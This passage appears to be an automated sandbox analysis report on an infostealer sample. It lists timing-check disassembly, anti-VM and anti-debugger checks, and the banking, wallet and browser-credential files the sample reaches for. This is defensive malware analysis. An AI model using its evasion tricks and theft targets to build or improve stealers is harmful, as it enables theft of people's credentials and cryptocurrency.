                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4684 second address: 5ED46D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B3594Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b add dword ptr [ebp+122D20D1h], esi 0x00000011 popad 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F66C0B35948h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e pushad 0x0000002f mov eax, 1A6B06B5h 0x00000034 stc 0x00000035 popad 0x00000036 mov dh, 26h 0x00000038 push C9F04C3Bh 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED46D5 second address: 5ED46D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4760 second address: 5ED4765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED48DD second address: 5ED48E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED48E1 second address: 5ED4906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66C0B35957h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4906 second address: 5ED490B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED490B second address: 5ED4981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F66C0B35946h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jp 00007F66C0B35954h 0x00000016 pop eax 0x00000017 push eax 0x00000018 movsx edx, di 0x0000001b pop edx 0x0000001c push 00000003h 0x0000001e mov esi, dword ptr [ebp+122D1C81h] 0x00000024 push 00000000h 0x00000026 mov edx, dword ptr [ebp+122D20C5h] 0x0000002c jne 00007F66C0B3594Ch 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F66C0B35948h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e or dword ptr [ebp+122D1FCFh], edi 0x00000054 push BD1A3915h 0x00000059 push eax 0x0000005a push edx 0x0000005b push ebx 0x0000005c pushad 0x0000005d popad 0x0000005e pop ebx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4981 second address: 5ED49F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F66C0B351F6h 0x00000009 jmp 00007F66C0B351FBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 7D1A3915h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F66C0B351F8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 jmp 00007F66C0B35203h 0x00000037 sub dword ptr [ebp+122D20CBh], eax 0x0000003d lea ebx, dword ptr [ebp+1244A570h] 0x00000043 mov dword ptr [ebp+122D1F45h], ecx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F66C0B351FCh 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED49F3 second address: 5ED49F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4A6C second address: 5ED4A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4A72 second address: 5ED4B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 add dword ptr [esp], 1FCC0A2Ch 0x0000000d xor dx, 45EDh 0x00000012 push 00000003h 0x00000014 mov ecx, 0586557Fh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F66C0B35948h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov esi, dword ptr [ebp+122D2CB1h] 0x0000003b mov dword ptr [ebp+122D350Eh], ecx 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007F66C0B35948h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 0000001Dh 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d call 00007F66C0B35949h 0x00000062 jno 00007F66C0B35950h 0x00000068 push eax 0x00000069 jmp 00007F66C0B3594Dh 0x0000006e mov eax, dword ptr [esp+04h] 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 je 00007F66C0B35946h 0x0000007b jmp 00007F66C0B35952h 0x00000080 popad 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4B23 second address: 5ED4B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4B28 second address: 5ED4BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c jmp 00007F66C0B3594Bh 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 js 00007F66C0B3595Bh 0x0000001d jmp 00007F66C0B35955h 0x00000022 pop eax 0x00000023 pop eax 0x00000024 mov dword ptr [ebp+12445490h], edx 0x0000002a lea ebx, dword ptr [ebp+1244A57Bh] 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F66C0B35948h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, ecx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F66C0B35953h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5169 second address: 5EF516F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF516F second address: 5EF517C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF517C second address: 5EF5180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5180 second address: 5EF51A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F66C0B35951h 0x0000000c jp 00007F66C0B35946h 0x00000012 pop ebx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF52ED second address: 5EF5306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35203h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5306 second address: 5EF5313 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5313 second address: 5EF5332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5332 second address: 5EF5338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5338 second address: 5EF535B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F66C0B3520Bh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F66C0B35203h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF55DC second address: 5EF55EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B3594Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF571F second address: 5EF5737 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5B2B second address: 5EF5B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5C8B second address: 5EF5C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5DE9 second address: 5EF5DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5DEF second address: 5EF5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F66C0B351FEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5DFE second address: 5EF5E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEAFB5 second address: 5EEAFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F66C0B351FCh 0x0000000a ja 00007F66C0B351F6h 0x00000010 push esi 0x00000011 jc 00007F66C0B351F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF6AC9 second address: 5EF6AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B3594Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F66C0B35954h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFD176 second address: 5EFD199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F66C0B35209h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFD199 second address: 5EFD19F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFD19F second address: 5EFD1B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66C0B351FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFD1B0 second address: 5EFD1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFD1B8 second address: 5EFD1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFD1C0 second address: 5EFD1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F66C0B35946h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFF775 second address: 5EFF77E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFF77E second address: 5EFF7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop esi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jl 00007F66C0B35948h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F66C0B35955h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 54A7AD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 548666 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 722A8C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 781BF8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D5DB34 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F04D13 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5484Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5340Thread sleep time: -38019s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5936Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4916Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: file.exe, 00000000.00000003.2222038220.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221933107.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221760722.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221328388.00000000057AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nR
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221266211.00000000057F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: file.exe, 00000000.00000003.2221328388.00000000057E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: file.exe, 00000000.00000003.2274120988.0000000000E69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: file.exe, 00000000.00000003.2197414052.0000000000E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ts/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\Ind+
                Source: file.exe, 00000000.00000003.2298940931.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: file.exe, 00000000.00000003.2274120988.0000000000E69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: file.exe, 00000000.00000003.2298940931.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus
                Source: file.exe, 00000000.00000003.2298940931.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: file.exe, 00000000.00000003.2274445412.0000000000E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
